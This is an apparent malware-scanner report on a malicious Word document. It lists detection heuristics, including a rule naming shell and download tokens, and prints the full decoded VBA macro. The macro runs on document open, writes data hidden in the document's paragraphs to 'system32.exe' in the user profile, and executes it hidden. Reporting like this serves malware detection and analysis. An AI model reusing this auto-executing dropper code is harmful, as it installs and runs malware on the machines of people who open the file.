MALICIOUS
234
Risk Score
Heuristics 10
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Tpwrd7 = Shell(Tpwrd10, vbHide) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Tpwrd2 = Environ("USERPROFILE") -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1702 bytes |
SHA-256: 2a5d11cbe2ed5a04b816d6a34f44af50805ba7db37ea0b9f28eb0b189dfa72b8 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub Auto_Open()
Tpwrd12
End Sub
Sub Tpwrd12()
Dim Tpwrd7 As Integer
Dim Tpwrd1 As String
Dim Tpwrd2 As String
Dim Tpwrd3 As Integer
Dim Tpwrd4 As Paragraph
Dim Tpwrd8 As Integer
Dim Tpwrd9 As Boolean
Dim Tpwrd5 As Integer
Dim Tpwrd11 As String
Dim Tpwrd6 As Byte
Dim Qdantnrtst As String
Qdantnrtst = "Qdantnrtst"
Tpwrd1 = "system32.exe"
Tpwrd2 = Environ("USERPROFILE")
ChDrive (Tpwrd2)
ChDir (Tpwrd2)
Tpwrd3 = FreeFile()
Open Tpwrd1 For Binary As Tpwrd3
For Each Tpwrd4 In ActiveDocument.Paragraphs
DoEvents
Tpwrd11 = Tpwrd4.Range.Text
If (Tpwrd9 = True) Then
Tpwrd8 = 1
While (Tpwrd8 < Len(Tpwrd11))
Tpwrd6 = Mid(Tpwrd11, Tpwrd8, 4)
Put #Tpwrd3, , Tpwrd6
Tpwrd8 = Tpwrd8 + 4
Wend
ElseIf (InStr(1, Tpwrd11, Qdantnrtst) > 0 And Len(Tpwrd11) > 0) Then
Tpwrd9 = True
End If
Next
Close #Tpwrd3
Tpwrd13 (Tpwrd1)
End Sub
Sub Tpwrd13(Tpwrd10 As String)
Dim Tpwrd7 As Integer
Dim Tpwrd2 As String
Tpwrd2 = Environ("USERPROFILE")
ChDrive (Tpwrd2)
ChDir (Tpwrd2)
Tpwrd7 = Shell(Tpwrd10, vbHide)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.